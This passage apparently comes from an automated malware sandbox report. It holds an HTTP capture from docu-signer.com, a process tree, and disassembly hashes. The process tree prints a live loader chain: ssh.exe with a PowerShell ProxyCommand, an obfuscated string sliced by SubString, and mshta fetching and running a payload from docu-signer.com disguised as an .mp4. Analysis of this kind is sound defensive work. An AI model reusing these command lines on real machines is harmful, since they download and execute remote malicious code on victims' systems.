                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                    Host: docu-signer.com
                                    Connection: Keep-Alive
                                    2024-12-31 14:41:51 UTC409INHTTP/1.1 200 OK
                                    Date: Tue, 31 Dec 2024 14:41:51 GMT
                                    Content-Type: image/png
                                    Content-Length: 452
                                    Connection: close
                                    Last-Modified: Mon, 16 Dec 2024 06:11:56 GMT
                                    ETag: "675fc4ac-1c4"
                                    Server: cloudflare
                                    CF-RAY: 8fab08665e8e8c81-EWR
                                    X-Frame-Options: DENY
                                    X-Content-Type-Options: nosniff
                                    Expires: Tue, 31 Dec 2024 16:41:51 GMT
                                    Cache-Control: max-age=7200
                                    Cache-Control: public
                                    Accept-Ranges: bytes
                                    2024-12-31 14:41:51 UTC452INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 36 00 00 00 36 08 03 00 00 00 bb 9b 9a ef 00 00 00 33 50 4c 54 45 c1 45 3f c1 45 3f c1 45 3f c1 45 3f c1 45 3f c1 45 3f c1 45 3f c1 45 3f c1 45 3f c1 45 3f c1 45 3f c1 45 3f c1 45 3f c1 45 3f c1 45 3f c1 45 3f c1 45 3f ab b2 22 ed 00 00 00 11 74 52 4e 53 00 40 30 10 60 8f bf ff ef 7f af 9f df 20 50 cf 70 60 82 c8 9b 00 00 01 2f 49 44 41 54 78 01 bd d3 05 d2 b4 30 10 06 e1 8e 6c de c1 36 dc ff b2 9f 2b 95 c9 12 7e 79 4a 91 46 22 b8 c2 8b c8 80 94 6f 45 1f ac 4c 81 33 f2 ac 03 5b 1e 95 69 32 b5 94 6e 98 57 79 4a c4 91 8a 7a 26 9a 82 a9 af a4 46 95 f5 d0 1a fb 95 c7 62 bf b2 f2 e9 70 7e e3 a7 a0 df ee 7c 3a 74 35 f1 6d b3 b3 99 66 70 af 69 f2 2f 65 ef c7 fa 99 25 de 25 1b c9 b4 f0 6e d2 50 a6 ed fb 65
                                    Data Ascii: PNGIHDR663PLTEE?E?E?E?E?E?E?E?E?E?E?E?E?E?E?E?E?"tRNS@0` Pp`/IDATx0l6+~yJF"oEL3[i2nWyJz&Fbp~|:t5mfpi/e%%nPe


                                    Statistics

                                    CPU Usage

                                    Click to jump to process

                                    Memory Usage

                                    Click to jump to process

                                    High Level Behavior Distribution

                                    Click to dive into process behavior distribution

                                    Behavior

                                    Click to jump to process

                                    System Behavior

                                    General

                                    Target ID:1
                                    Start time:09:41:43
                                    Start date:31/12/2024
                                    Path:C:\Windows\System32\OpenSSH\ssh.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Windows\System32\OpenSSH\ssh.exe" -o ProxyCommand="powershell powershell -Command 'ALC15Y7xI6iZdmshta https://docu-signer.com/api/uz/0912545164/index.mp4ALC15Y7xI6iZd'.SubString(13, 57)" .
                                    Imagebase:0x7ff6f5790000
                                    File size:946'176 bytes
                                    MD5 hash:C05426E6F6DFB30FB78FBA874A2FF7DC
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:moderate
                                    Has exited:false

                                    General

                                    Target ID:2
                                    Start time:09:41:43
                                    Start date:31/12/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff75da10000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:false

                                    General

                                    Target ID:3
                                    Start time:09:41:44
                                    Start date:31/12/2024
                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):false
                                    Commandline:powershell powershell -Command 'ALC15Y7xI6iZdmshta https://docu-signer.com/api/uz/0912545164/index.mp4ALC15Y7xI6iZd'.SubString(13, 57)
                                    Imagebase:0x7ff741d30000
                                    File size:452'608 bytes
                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:4
                                    Start time:09:41:46
                                    Start date:31/12/2024
                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta https://docu-signer.com/api/uz/0912545164/index.mp4"
                                    Imagebase:0x7ff741d30000
                                    File size:452'608 bytes
                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:5
                                    Start time:09:41:46
                                    Start date:31/12/2024
                                    Path:C:\Windows\System32\mshta.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Windows\system32\mshta.exe" https://docu-signer.com/api/uz/0912545164/index.mp4
                                    Imagebase:0x7ff696ce0000
                                    File size:14'848 bytes
                                    MD5 hash:0B4340ED812DC82CE636C00FA5C9BEF2
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:moderate
                                    Has exited:false

                                    General

                                    Target ID:7
                                    Start time:09:41:50
                                    Start date:31/12/2024
                                    Path:C:\Windows\System32\svchost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                    Imagebase:0x7ff7b4ee0000
                                    File size:55'320 bytes
                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:false

                                    Disassembly

                                    Reset < >

                                      Executed Functions

                                      Function 00007FFAAC5433B5 Relevance: .0, Instructions: 49COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000004.00000002.1465586607.00007FFAAC540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC540000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_4_2_7ffaac540000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                      • Instruction ID: 93d3fdf9ee1a8a440eedcd2d7ae171c4928e04bcfd6d08fa7e30168330699156
                                      • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                      • Instruction Fuzzy Hash: 3201677115CB0D8FD744EF0CE451AA5B7E0FB95364F10056DE58AC3661DA36E882CB45

                                      Executed Functions

                                      Function 00000180AF340FB1 Relevance: .0, Instructions: 5COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2682194545.00000180AF340000.00000010.00000800.00020000.00000000.sdmp, Offset: 00000180AF340000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_180af340000_mshta.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
                                      • Instruction ID: 95c70015d66722e14df5ff09e27bfe6da325f97d8d3ce628a18b11a40bb7e97a
                                      • Opcode Fuzzy Hash: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
                                      • Instruction Fuzzy Hash: 8D90025959950A55D55911911C4629C5040678C252FD484944827911C4D84D039A1252
                                      Function 00000180AF340FB9 Relevance: .0, Instructions: 5COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2682194545.00000180AF340000.00000010.00000800.00020000.00000000.sdmp, Offset: 00000180AF340000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_180af340000_mshta.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
                                      • Instruction ID: 95c70015d66722e14df5ff09e27bfe6da325f97d8d3ce628a18b11a40bb7e97a
                                      • Opcode Fuzzy Hash: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
                                      • Instruction Fuzzy Hash: 8D90025959950A55D55911911C4629C5040678C252FD484944827911C4D84D039A1252
                                      Function 00000180AF340FA1 Relevance: .0, Instructions: 5COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2682194545.00000180AF340000.00000010.00000800.00020000.00000000.sdmp, Offset: 00000180AF340000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_180af340000_mshta.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
                                      • Instruction ID: 95c70015d66722e14df5ff09e27bfe6da325f97d8d3ce628a18b11a40bb7e97a
                                      • Opcode Fuzzy Hash: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
                                      • Instruction Fuzzy Hash: 8D90025959950A55D55911911C4629C5040678C252FD484944827911C4D84D039A1252
                                      Function 00000180AF340FC1 Relevance: .0, Instructions: 5COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2682194545.00000180AF340000.00000010.00000800.00020000.00000000.sdmp, Offset: 00000180AF340000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_180af340000_mshta.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
                                      • Instruction ID: 95c70015d66722e14df5ff09e27bfe6da325f97d8d3ce628a18b11a40bb7e97a
                                      • Opcode Fuzzy Hash: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
                                      • Instruction Fuzzy Hash: 8D90025959950A55D55911911C4629C5040678C252FD484944827911C4D84D039A1252